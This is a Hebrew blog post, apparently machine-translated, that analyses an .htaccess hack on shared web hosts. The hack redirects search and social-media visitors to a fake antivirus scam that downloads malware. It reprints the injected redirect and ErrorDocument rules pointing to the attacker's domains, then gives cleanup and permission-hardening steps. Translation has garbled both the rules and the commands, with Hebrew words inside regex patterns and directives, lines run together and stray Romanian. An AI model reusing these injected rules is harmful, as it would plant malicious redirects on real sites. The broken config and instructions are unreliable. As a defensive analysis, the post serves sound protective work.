צורה חדשה של וירוס לגביו אני רואה שלא הרבה ידוע, זה משפיע על אתרים שמתארחים בהם שרתים לא אמינים שבו יכולים חשבונות משתמש / תת-דומיין “לִרְאוֹת” ביניהם. ליתר דיוק, כל חשבונות האירוח ממוקמים בתיקייה “vhosts“, וזכויות היוצרים של תיקיית המשתמש מִן “vhosts” הוא ניתן למשתמש כללי… משווק ברוב המצבים. It is a typical method of web servers that do not use WHM/cPanelו
תוֹכֶן
הפעולה של וירוס .htaccess – .htaccess האק
נגיף להשפיע על הקבצים .HTACCESS של אתר הקורבן. מתווספות שורות / הוֹרָאָה לאיזה להפנות מבקרים (מגיעים מאתרים ופורטלים של yahoo, msn, google, facebook, yaindex, twitter, myspace וכו' עם תעבורה גבוהה) לכמה אתרים שמציעים “פתרונות אנטי וירוס“. זה בערך פתרונות אנטי וירוס מזויפים, שעליו כתבתי בהקדמה מ מסיר אנטי וירוס מזויףו
הנה איך אחד נראה .HTACCESS מושפע: (אל תיגש לכתובות האתרים בתוכן השורות למטה)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine פועל
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
rewritecond %{http_referer} .*wikipedia.*$ [nc,or]
RewriteCond %{HTTP_REFERER} .*בלוגר.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*חי.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*קליק כפול.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*שאל.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*גוטו.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*חיפוש.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-ד
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
המשתמשים בוורדפרס ימצאו שורות אלו בקובץ .HTACCESS מִן Public_html. בנוסף, הווירוס יוצר .htaccess זהה בתיקייה wp-contentו
*ישנם גם מצבים שבהם במקום peoriavascularsurgery.com זה מופיע dns.thesoulfoodcafe.com או כתובות אחרות.
מה הוירוס הזה עושה?
לאחר ההפניה מחדש, המבקר מתקבל בזרועות פתוחות על ידי ההודעה:
אַזהָרָה!
המחשב שלך מכיל סימנים שונים של נוכחות של וירוסים ותוכנות תוכנות זדוניות. המערכת שלך דורשת בדיקת אנטי וירוס מיידית!
אבטחת המערכת תבצע סריקה מהירה וחינמית של המחשב האישי שלך לאיתור וירוסים ותוכניות זדוניות.
לא משנה על איזה כפתור נלחץ, אנחנו מועברים לדף של “המחשב שלי“, נוצר כדי לחקות עיצוב XP. כאן זה מתחיל אוטומטית “תהליך סריקה”, שבסיומו אנו מגלים את זה “אנחנו נגועים”ו
לאחר לחיצה על אישור או ביטול, זה יתחיל הורדשל קובץ setup.exe. זֶה setup.exe הוא האנטי וירוס המזויף מה שמשפיע על המערכת. היא תתקין סדרה של אפליקציות תוכנה זדוניות שיפיצו עוד יותר את הקישורים הנגועים, ובנוסף לאלה א תוכנת אנטי וירוס (גם מזויף) שהקורבן מוזמן לקנות.
מי שכבר יצר קשר עם טופס זה של הנגיף יכול להשתמש בו מסיר אנטי וירוס מזויף. כמו כן, מומלץ לסרוק את כל הדיסק הקשיח. לְהַמלִיץ קספרסקי אינטרנט אבטחה אוֹ קספרסקי אנטי וירוסו
צורה זו של וירוס משפיעה על מערכות ההפעלה של מבקרים עם מערכות הפעלה Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 ו-Windows 95. עד כה, לא ידוע על מקרים של הדבקה של מערכות ההפעלה Windows Vista ו-Windows 7.
כיצד נוכל להסיר את וירוס ה-.htaccess הזה מהשרת וכיצד נוכל למנוע הדבקה.
1. ניתוח קבצים ומחיקת קודים חשודים. כדי לוודא שלא רק הקובץ מושפע .HTACCESS זה טוב ל אנו מנתחים את כל הקבצים .php וכן .jsו
2. אנו כותבים מחדש את קובץ ה-.htaccess ומגדירים אותו chmod 644 אוֹ 744 עם זכויות כתיבה בלבד הבעלים של user-ulו
3. בעת יצירת חשבון אחסון לאתר, בתיקייה /בַּיִת אוֹ /webroot תיווצר אוטומטית תיקיה שבדרך כלל יש לה את שם המשתמש (משתמש עבור cpanel, ftpוכו'). על מנת למנוע כתיבת נתונים והעברת וירוסים ממשתמש אחד לאחר, מומלץ להגדיר בכל תיקיית משתמש:
Chmod 644 Sau 744, 755 – המצוין הוא 644.
chown -R nume_user nume_folder.
chgrp -R nume_user nume_folder
זה הכל כדי לבדוק אם המצבים הוגדרו כהלכה. משהו כזה אמור להופיע:
drwx–x–x 12 דינמיקה דינמיקה 4096 6 במאי 14:51 דינמיקה/
drwx–x–x 10 duran duran 4096 7 במרץ 07:46 duran/
drwx–x–x 12 מבחנות מבחנות מבחנות 4096 29 ינואר 11:23 מבחנות/
drwxr-xr-x 14 express express 4096 26 בפברואר 2009 express/
drwxr-xr-x 9 אותם אלה 4096 19 במאי 01:09 אלה/
drwx–x–x 9 חוות חווה 4096 19 בדצמבר 22:29 חוות/
אם לאחד מהמשתמשים לעיל יהיה FTP קבצים נגועים, הוא לא יוכל לשלוח את הווירוס למשתמש מתארח אחר. זהו אמצעי אבטחה מינימלי להגנה על החשבונות המתארחים בשרת אינטרנט.
אלמנטים נפוצים של תחומים המושפעים מסוג זה של וירוסים.
כל הדומיינים המושפעים מפנים מבקרים לאתרים המכילים את שם הדומיין “/ /main.php?e=4&ח“ו
זֶה “virus de .htaccess” משפיע על כל סוג של CMS (ג'ומלה, וורדפרס, phpBB, וכו') שמשתמש .HTACCESSו
פריצת וירוסים .htaccess & הפניה מחדשו
